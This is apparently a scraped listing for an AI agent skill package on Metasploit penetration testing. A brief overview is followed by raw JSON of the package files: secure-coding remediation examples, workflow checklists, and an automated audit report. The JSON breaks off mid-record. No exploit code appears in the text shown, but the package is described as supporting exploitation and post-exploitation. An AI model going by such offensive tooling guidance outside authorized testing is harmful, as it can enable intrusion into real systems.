Metasploit Framework Penetration Testing Overview

Metasploit Framework is the industry-standard platform for penetration testing, vulnerability validation, and exploit development. This skill provides structured workflows for authorized offensive security operations including exploitation, post-exploitation, and payload delivery.

IMPORTANT: This skill is for AUTHORIZED security testing only. Always ensure proper authorization, scoping documents, and legal compliance before conducting penetration testing activities.

Quick Start

Initialize Metasploit console and verify database connectivity: C…

, user_id):\n raise ValueError(\"Invalid user ID format\")\n\n# Use ORM query builders\nuser = User.query.filter_by(id=user_id).first()\n```\n\n**Step 4: Implement least privilege**\n- Database user should have minimum required permissions\n- Use read-only accounts for SELECT operations\n- Never use admin/root accounts for application queries\n\n### XSS Remediation\n\n**Step 1: Enable auto-escaping**\n- Most modern frameworks escape by default\n- Ensure auto-escaping is not disabled\n\n**Step 2: Use framework-specific safe methods**\n\n```javascript\n// React: Use JSX (auto-escapes)\n\u003cdiv>{userInput}\u003c/div>\n\n// Vue: Use template syntax (auto-escapes)\n\u003cdiv>{{ userInput }}\u003c/div>\n\n// Angular: Use property binding (auto-escapes)\n\u003cdiv [textContent]=\"userInput\">\u003c/div>\n```\n\n**Step 3: Sanitize when HTML is required**\n\n```javascript\nimport DOMPurify from 'dompurify';\n\n// Sanitize HTML content\nconst clean = DOMPurify.sanitize(userHTML, {\n ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'p'],\n ALLOWED_ATTR: []\n});\n```\n\n**Step 4: Content Security Policy (CSP)**\n\n```html\n\u003c!-- Add CSP header -->\nContent-Security-Policy: default-src 'self'; script-src 'self' 'nonce-{random}'\n```\n\n---\n\n## Advanced Configuration\n\nThis section contains detailed configuration options and tuning parameters.\n\n### Example: SAST Tool Configuration\n\n```yaml\n# Advanced security scanner configuration\nscanner:\n # Severity threshold\n severity_threshold: MEDIUM\n\n # Rule configuration\n rules:\n enabled:\n - sql-injection\n - xss\n - hardcoded-secrets\n disabled:\n - informational-only\n\n # False positive reduction\n confidence_threshold: HIGH\n exclude_patterns:\n - \"*/test/*\"\n - \"*/tests/*\"\n - \"*/node_modules/*\"\n - \"*.test.js\"\n - \"*.spec.ts\"\n\n # Performance tuning\n max_file_size_kb: 2048\n timeout_seconds: 300\n parallel_jobs: 4\n\n # Output configuration\n output_format: json\n include_code_snippets: true\n 
max_snippet_lines: 10\n```\n\n---\n\n## Examples and Code Samples\n\nThis section provides comprehensive code examples for various scenarios.\n\n### Example 1: Secure API Authentication\n\n```python\n# Secure API key handling\nimport os\nfrom functools import wraps\nfrom flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\n# Load API key from environment (never hardcode)\nVALID_API_KEY = os.environ.get('API_KEY')\nif not VALID_API_KEY:\n raise ValueError(\"API_KEY environment variable not set\")\n\ndef require_api_key(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n api_key = request.headers.get('X-API-Key')\n\n if not api_key:\n return jsonify({'error': 'API key required'}), 401\n\n # Constant-time comparison to prevent timing attacks\n import hmac\n if not hmac.compare_digest(api_key, VALID_API_KEY):\n return jsonify({'error': 'Invalid API key'}), 403\n\n return f(*args, **kwargs)\n return decorated_function\n\n\n@app.route('/api/secure-endpoint')\n@require_api_key\ndef secure_endpoint():\n return jsonify({'message': 'Access granted'})\n```\n\n### Example 2: Secure Password Hashing\n\n```python\n# Secure password storage with bcrypt\nimport bcrypt\n\ndef hash_password(password: str) -> str:\n \"\"\"Hash a password using bcrypt.\"\"\"\n # Generate salt and hash password\n salt = bcrypt.gensalt(rounds=12) # Cost factor: 12 (industry standard)\n hashed = bcrypt.hashpw(password.encode('utf-8'), salt)\n return hashed.decode('utf-8')\n\ndef verify_password(password: str, hashed: str) -> bool:\n \"\"\"Verify a password against a hash.\"\"\"\n return bcrypt.checkpw(\n password.encode('utf-8'),\n hashed.encode('utf-8')\n )\n\n# Usage\nstored_hash = hash_password(\"user_password\")\nis_valid = verify_password(\"user_password\", stored_hash) # True\n```\n\n### Example 3: Secure File Upload\n\n```python\n# Secure file upload with validation\nimport os\nimport magic\nfrom werkzeug.utils import secure_filename\n\nALLOWED_EXTENSIONS = {'pdf', 'png', 
'jpg', 'jpeg'}\nALLOWED_MIME_TYPES = {\n 'application/pdf',\n 'image/png',\n 'image/jpeg'\n}\nMAX_FILE_SIZE = 5 * 1024 * 1024 # 5 MB\n\ndef is_allowed_file(filename: str, file_content: bytes) -> bool:\n \"\"\"Validate file extension and MIME type.\"\"\"\n # Check extension\n if '.' not in filename:\n return False\n\n ext = filename.rsplit('.', 1)[1].lower()\n if ext not in ALLOWED_EXTENSIONS:\n return False\n\n # Check MIME type (prevent extension spoofing)\n mime = magic.from_buffer(file_content, mime=True)\n if mime not in ALLOWED_MIME_TYPES:\n return False\n\n return True\n\ndef handle_upload(file):\n \"\"\"Securely handle file upload.\"\"\"\n # Check file size\n file.seek(0, os.SEEK_END)\n size = file.tell()\n file.seek(0)\n\n if size > MAX_FILE_SIZE:\n raise ValueError(\"File too large\")\n\n # Read content for validation\n content = file.read()\n file.seek(0)\n\n # Validate file type\n if not is_allowed_file(file.filename, content):\n raise ValueError(\"Invalid file type\")\n\n # Sanitize filename\n filename = secure_filename(file.filename)\n\n # Generate unique filename to prevent overwrite attacks\n import uuid\n unique_filename = f\"{uuid.uuid4()}_{filename}\"\n\n # Save to secure location (outside web root)\n upload_path = os.path.join('/secure/uploads', unique_filename)\n file.save(upload_path)\n\n return unique_filename\n```\n\n---\n\n## Best Practices for Reference Documents\n\n1. **Start with \"When to use\"** - Help Claude know when to load this reference\n2. **Include table of contents** - For documents >100 lines\n3. **Use concrete examples** - Code samples with vulnerable and fixed versions\n4. **Map to frameworks** - OWASP, CWE, MITRE ATT&CK for context\n5. **Provide remediation** - Don't just identify issues, show how to fix them\n6. **Organize logically** - Group related content, use clear headings\n7. **Keep examples current** - Use modern patterns and current framework versions\n8. 
**Be concise** - Even in references, challenge every sentence\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":15672,"content_sha256":"d830809dec44c82770c5ef0fe12831754f113931dc739891a1ec8186aefc629f"},{"filename":"references/WORKFLOW_CHECKLIST.md","content":"# Workflow Checklist Template\n\nThis template demonstrates workflow patterns for security operations. Copy and adapt these checklists to your specific skill needs.\n\n## Pattern 1: Sequential Workflow Checklist\n\nUse this pattern for operations that must be completed in order, step-by-step.\n\n### Security Assessment Workflow\n\nProgress:\n[ ] 1. Identify application entry points and attack surface\n[ ] 2. Map authentication and authorization flows\n[ ] 3. Identify data flows and sensitive data handling\n[ ] 4. Review existing security controls\n[ ] 5. Document findings with framework references (OWASP, CWE)\n[ ] 6. Prioritize findings by severity (CVSS scores)\n[ ] 7. Generate report with remediation recommendations\n\nWork through each step systematically. Check off completed items.\n\n---\n\n## Pattern 2: Conditional Workflow\n\nUse this pattern when the workflow branches based on findings or conditions.\n\n### Vulnerability Remediation Workflow\n\n1. Identify vulnerability type\n - If SQL Injection → See [sql-injection-remediation.md](sql-injection-remediation.md)\n - If XSS (Cross-Site Scripting) → See [xss-remediation.md](xss-remediation.md)\n - If Authentication flaw → See [auth-remediation.md](auth-remediation.md)\n - If Authorization flaw → See [authz-remediation.md](authz-remediation.md)\n - If Cryptographic issue → See [crypto-remediation.md](crypto-remediation.md)\n\n2. Assess severity using CVSS calculator\n - If CVSS >= 9.0 → Priority: Critical (immediate action)\n - If CVSS 7.0-8.9 → Priority: High (action within 24h)\n - If CVSS 4.0-6.9 → Priority: Medium (action within 1 week)\n - If CVSS \u003c 4.0 → Priority: Low (action within 30 days)\n\n3. 
Apply appropriate remediation pattern\n4. Validate fix with security testing\n5. Document changes and update security documentation\n\n---\n\n## Pattern 3: Iterative Workflow\n\nUse this pattern for operations that repeat across multiple targets or items.\n\n### Code Security Review Workflow\n\nFor each file in the review scope:\n1. Identify security-sensitive operations (auth, data access, crypto, input handling)\n2. Check against secure coding patterns for the language\n3. Flag potential vulnerabilities with severity rating\n4. Map findings to CWE and OWASP categories\n5. Suggest specific remediation approaches\n6. Document finding with code location and fix priority\n\nContinue until all files in scope have been reviewed.\n\n---\n\n## Pattern 4: Feedback Loop Workflow\n\nUse this pattern when validation and iteration are required.\n\n### Secure Configuration Generation Workflow\n\n1. Generate initial security configuration based on requirements\n2. Run validation script: `./scripts/validate_config.py config.yaml`\n3. Review validation output:\n - Note all errors (must fix)\n - Note all warnings (should fix)\n - Note all info items (consider)\n4. Fix identified issues in configuration\n5. Repeat steps 2-4 until validation passes with zero errors\n6. Review warnings and determine if they should be addressed\n7. Apply configuration once validation is clean\n\n**Validation Loop**: Run validator → Fix errors → Repeat until clean\n\n---\n\n## Pattern 5: Parallel Analysis Workflow\n\nUse this pattern when multiple independent analyses can run concurrently.\n\n### Comprehensive Security Scan Workflow\n\nRun these scans in parallel:\n\n**Static Analysis**:\n[ ] 1a. Run SAST scan (Semgrep/Bandit)\n[ ] 1b. Run dependency vulnerability scan (Safety/npm audit)\n[ ] 1c. Run secrets detection (Gitleaks/TruffleHog)\n[ ] 1d. Run license compliance check\n\n**Dynamic Analysis**:\n[ ] 2a. Run DAST scan (ZAP/Burp)\n[ ] 2b. Run API security testing\n[ ] 2c. 
Run authentication/authorization testing\n\n**Infrastructure Analysis**:\n[ ] 3a. Run infrastructure-as-code scan (Checkov/tfsec)\n[ ] 3b. Run container image scan (Trivy/Grype)\n[ ] 3c. Run configuration review\n\n**Consolidation**:\n[ ] 4. Aggregate all findings\n[ ] 5. Deduplicate and correlate findings\n[ ] 6. Prioritize by risk (CVSS + exploitability + business impact)\n[ ] 7. Generate unified security report\n\n---\n\n## Pattern 6: Research and Documentation Workflow\n\nUse this pattern for security research and documentation tasks.\n\n### Threat Modeling Workflow\n\nResearch Progress:\n[ ] 1. Identify system components and boundaries\n[ ] 2. Map data flows between components\n[ ] 3. Identify trust boundaries\n[ ] 4. Enumerate assets (data, services, credentials)\n[ ] 5. Apply STRIDE framework to each component:\n - Spoofing threats\n - Tampering threats\n - Repudiation threats\n - Information disclosure threats\n - Denial of service threats\n - Elevation of privilege threats\n[ ] 6. Map threats to MITRE ATT&CK techniques\n[ ] 7. Identify existing mitigations\n[ ] 8. Document residual risks\n[ ] 9. Recommend additional security controls\n[ ] 10. Generate threat model document\n\nWork through each step systematically. Check off completed items.\n\n---\n\n## Pattern 7: Compliance Validation Workflow\n\nUse this pattern for compliance checks against security standards.\n\n### Security Compliance Audit Workflow\n\n**SOC 2 Controls Review**:\n[ ] 1. Review access control policies (CC6.1, CC6.2, CC6.3)\n[ ] 2. Verify logical access controls implementation (CC6.1)\n[ ] 3. Review authentication mechanisms (CC6.1)\n[ ] 4. Verify encryption implementation (CC6.1, CC6.7)\n[ ] 5. Review audit logging configuration (CC7.2)\n[ ] 6. Verify security monitoring (CC7.2, CC7.3)\n[ ] 7. Review incident response procedures (CC7.3, CC7.4)\n[ ] 8. Verify backup and recovery processes (A1.2, A1.3)\n\n**Evidence Collection**:\n[ ] 9. Collect policy documents\n[ ] 10. 
Collect configuration screenshots\n[ ] 11. Collect audit logs\n[ ] 12. Document control gaps\n[ ] 13. Generate compliance report\n\n---\n\n## Pattern 8: Incident Response Workflow\n\nUse this pattern for security incident handling.\n\n### Security Incident Response Workflow\n\n**Detection and Analysis**:\n[ ] 1. Confirm security incident (rule out false positive)\n[ ] 2. Determine incident severity (SEV1/2/3/4)\n[ ] 3. Identify affected systems and data\n[ ] 4. Preserve evidence (logs, memory dumps, network captures)\n\n**Containment**:\n[ ] 5. Isolate affected systems (network segmentation)\n[ ] 6. Disable compromised accounts\n[ ] 7. Block malicious indicators (IPs, domains, hashes)\n[ ] 8. Implement temporary compensating controls\n\n**Eradication**:\n[ ] 9. Identify root cause\n[ ] 10. Remove malicious artifacts (malware, backdoors, webshells)\n[ ] 11. Patch vulnerabilities exploited\n[ ] 12. Reset compromised credentials\n\n**Recovery**:\n[ ] 13. Restore systems from clean backups (if needed)\n[ ] 14. Re-enable systems with monitoring\n[ ] 15. Verify system integrity\n[ ] 16. Resume normal operations\n\n**Post-Incident**:\n[ ] 17. Document incident timeline\n[ ] 18. Identify lessons learned\n[ ] 19. Update security controls to prevent recurrence\n[ ] 20. Update incident response procedures\n[ ] 21. Communicate with stakeholders\n\n---\n\n## Usage Guidelines\n\n### When to Use Workflow Checklists\n\n✅ **Use checklists for**:\n- Complex multi-step operations\n- Operations requiring specific order\n- Security assessments and audits\n- Incident response procedures\n- Compliance validation tasks\n\n❌ **Don't use checklists for**:\n- Simple single-step operations\n- Highly dynamic exploratory work\n- Operations that vary significantly each time\n\n### Adapting This Template\n\n1. **Copy relevant pattern** to your skill's SKILL.md or create new reference file\n2. **Customize steps** to match your specific security tool or process\n3. 
**Add framework references** (OWASP, CWE, NIST) where applicable\n4. **Include tool-specific commands** for automation\n5. **Add decision points** where manual judgment is required\n\n### Checklist Best Practices\n\n- **Be specific**: \"Run semgrep --config=auto .\" not \"Scan the code\"\n- **Include success criteria**: \"Validation passes with 0 errors\"\n- **Reference standards**: Link to OWASP, CWE, NIST where relevant\n- **Show progress**: Checkbox format helps track completion\n- **Provide escape hatches**: \"If validation fails, see troubleshooting.md\"\n\n### Integration with Feedback Loops\n\nCombine checklists with validation scripts for maximum effectiveness:\n\n1. Create checklist for the workflow\n2. Provide validation script that checks quality\n3. Include \"run validator\" step in checklist\n4. Loop: Complete step → Validate → Fix issues → Re-validate\n\nThis pattern dramatically improves output quality through systematic validation.\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":8390,"content_sha256":"f667c8d5c6e5c50b491643d644082ff202a6bb94476e0e7b648c6d0e5c8a080f"},{"filename":"skill-report.json","content":"{\n \"schema_version\": \"2.0\",\n \"meta\": {\n \"generated_at\": \"2026-01-16T15:47:47.339Z\",\n \"slug\": \"agentsecops-pentest-metasploit\",\n \"source_url\": \"https://github.com/AgentSecOps/SecOpsAgentKit/tree/main/skills/offsec/pentest-metasploit\",\n \"source_ref\": \"main\",\n \"model\": \"claude\",\n \"analysis_version\": \"3.0.0\",\n \"source_type\": \"community\",\n \"content_hash\": \"3811ff195b0a5a8ff93b6a91824e91e9776f9df3188a0b271a8898b32b9bc38e\",\n \"tree_hash\": \"01c009edc6bef1d41c9228c0814cf3b4075572eb45ded2727328112c3044675d\"\n },\n \"skill\": {\n \"name\": \"pentest-metasploit\",\n \"description\": \"Penetration testing framework for exploit development, vulnerability validation, and authorized security assessments using Metasploit Framework. 
Use when: (1) Validating vulnerabilities in authorized security assessments, (2) Demonstrating exploit impact for security research, (3) Testing defensive controls in controlled environments, (4) Conducting authorized penetration tests with proper scoping and authorization, (5) Developing post-exploitation workflows for red team operations.\\n\",\n \"summary\": \"Penetration testing framework for exploit development, vulnerability validation, and authorized secu...\",\n \"icon\": \"🎯\",\n \"version\": \"0.1.0\",\n \"author\": \"AgentSecOps\",\n \"license\": \"MIT\",\n \"category\": \"offsec\",\n \"tags\": [\n \"pentest\",\n \"metasploit\",\n \"exploitation\",\n \"post-exploitation\",\n \"vulnerability-validation\",\n \"red-team\"\n ],\n \"supported_tools\": [\n \"claude\",\n \"codex\",\n \"claude-code\"\n ],\n \"risk_factors\": [\n \"external_commands\",\n \"network\",\n \"filesystem\",\n \"env_access\",\n \"scripts\"\n ]\n },\n \"security_audit\": {\n \"risk_level\": \"low\",\n \"is_blocked\": false,\n \"safe_to_publish\": true,\n \"summary\": \"This is a pure documentation skill providing Metasploit Framework guidance. Contains no executable code, scripts, or network operations. All static findings are false positives - the scanner detects security tool names and techniques in educational documentation that would only be dangerous if executed. 
The skill emphasizes legal compliance and authorization requirements throughout.\",\n \"risk_factor_evidence\": [\n {\n \"factor\": \"external_commands\",\n \"evidence\": [\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 298,\n \"line_end\": 298\n },\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 301,\n \"line_end\": 301\n },\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 304,\n \"line_end\": 304\n },\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 307,\n \"line_end\": 307\n },\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 310,\n \"line_end\": 310\n },\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 134,\n \"line_end\": 134\n },\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 250,\n \"line_end\": 250\n },\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 291,\n \"line_end\": 291\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 54,\n \"line_end\": 74\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 74,\n \"line_end\": 95\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 95,\n \"line_end\": 108\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 108,\n \"line_end\": 111\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 111,\n \"line_end\": 118\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 118,\n \"line_end\": 122\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 122,\n \"line_end\": 129\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 129,\n \"line_end\": 135\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 135,\n \"line_end\": 151\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 151,\n \"line_end\": 154\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 154,\n \"line_end\": 162\n },\n {\n \"file\": 
\"references/EXAMPLE.md\",\n \"line_start\": 162,\n \"line_end\": 296\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 296,\n \"line_end\": 306\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 306,\n \"line_end\": 309\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 309,\n \"line_end\": 318\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 318,\n \"line_end\": 333\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 333,\n \"line_end\": 342\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 342,\n \"line_end\": 346\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 346,\n \"line_end\": 354\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 354,\n \"line_end\": 358\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 358,\n \"line_end\": 361\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 361,\n \"line_end\": 371\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 371,\n \"line_end\": 404\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 404,\n \"line_end\": 414\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 414,\n \"line_end\": 447\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 447,\n \"line_end\": 451\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 451,\n \"line_end\": 472\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 472,\n \"line_end\": 476\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 476,\n \"line_end\": 537\n },\n {\n \"file\": \"references/WORKFLOW_CHECKLIST.md\",\n \"line_start\": 74,\n \"line_end\": 74\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 36,\n \"line_end\": 48\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 48,\n \"line_end\": 79\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 79,\n \"line_end\": 83\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 
83,\n \"line_end\": 87\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 87,\n \"line_end\": 91\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 91,\n \"line_end\": 97\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 97,\n \"line_end\": 101\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 101,\n \"line_end\": 113\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 113,\n \"line_end\": 127\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 127,\n \"line_end\": 133\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 133,\n \"line_end\": 142\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 142,\n \"line_end\": 154\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 154,\n \"line_end\": 176\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 176,\n \"line_end\": 179\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 179,\n \"line_end\": 180\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 180,\n \"line_end\": 181\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 181,\n \"line_end\": 182\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 182,\n \"line_end\": 188\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 188,\n \"line_end\": 199\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 199,\n \"line_end\": 202\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 202,\n \"line_end\": 203\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 203,\n \"line_end\": 204\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 204,\n \"line_end\": 205\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 205,\n \"line_end\": 211\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 211,\n \"line_end\": 223\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 223,\n \"line_end\": 227\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 227,\n \"line_end\": 233\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 233,\n \"line_end\": 276\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 276,\n \"line_end\": 282\n },\n {\n \"file\": 
\"SKILL.md\",\n \"line_start\": 282,\n \"line_end\": 286\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 286,\n \"line_end\": 293\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 293,\n \"line_end\": 297\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 297,\n \"line_end\": 311\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 311,\n \"line_end\": 315\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 315,\n \"line_end\": 322\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 322,\n \"line_end\": 330\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 330,\n \"line_end\": 344\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 344,\n \"line_end\": 348\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 348,\n \"line_end\": 377\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 377,\n \"line_end\": 390\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 390,\n \"line_end\": 400\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 400,\n \"line_end\": 411\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 411,\n \"line_end\": 416\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 416,\n \"line_end\": 430\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 350,\n \"line_end\": 350\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 444,\n \"line_end\": 444\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 38,\n \"line_end\": 38\n }\n ]\n },\n {\n \"factor\": \"network\",\n \"evidence\": [\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 240,\n \"line_end\": 240\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 43,\n \"line_end\": 43\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 44,\n \"line_end\": 44\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 45,\n \"line_end\": 45\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 73,\n \"line_end\": 73\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 118,\n \"line_end\": 
118\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 119,\n \"line_end\": 119\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 151,\n \"line_end\": 151\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 191,\n \"line_end\": 191\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 192,\n \"line_end\": 192\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 193,\n \"line_end\": 193\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 217,\n \"line_end\": 217\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 260,\n \"line_end\": 260\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 261,\n \"line_end\": 261\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 288,\n \"line_end\": 288\n },\n {\n \"file\": \"skill-report.json\",\n \"line_start\": 6,\n \"line_end\": 6\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 19,\n \"line_end\": 19\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 20,\n \"line_end\": 20\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 21,\n \"line_end\": 21\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 451,\n \"line_end\": 451\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 452,\n \"line_end\": 452\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 453,\n \"line_end\": 453\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 454,\n \"line_end\": 454\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 455,\n \"line_end\": 455\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 229,\n \"line_end\": 229\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 229,\n \"line_end\": 229\n }\n ]\n },\n {\n \"factor\": \"filesystem\",\n \"evidence\": [\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 323,\n \"line_end\": 323\n },\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 323,\n \"line_end\": 323\n }\n ]\n },\n {\n 
\"factor\": \"env_access\",\n \"evidence\": [\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 164,\n \"line_end\": 164\n },\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 164,\n \"line_end\": 164\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 148,\n \"line_end\": 148\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 148,\n \"line_end\": 148\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 147,\n \"line_end\": 147\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 162,\n \"line_end\": 162\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 132,\n \"line_end\": 132\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 147,\n \"line_end\": 147\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 148,\n \"line_end\": 148\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 156,\n \"line_end\": 156\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 157,\n \"line_end\": 157\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 162,\n \"line_end\": 162\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 162,\n \"line_end\": 162\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 163,\n \"line_end\": 163\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 164,\n \"line_end\": 164\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 165,\n \"line_end\": 165\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 423,\n \"line_end\": 423\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 423,\n \"line_end\": 423\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 423,\n \"line_end\": 423\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 424,\n \"line_end\": 424\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 
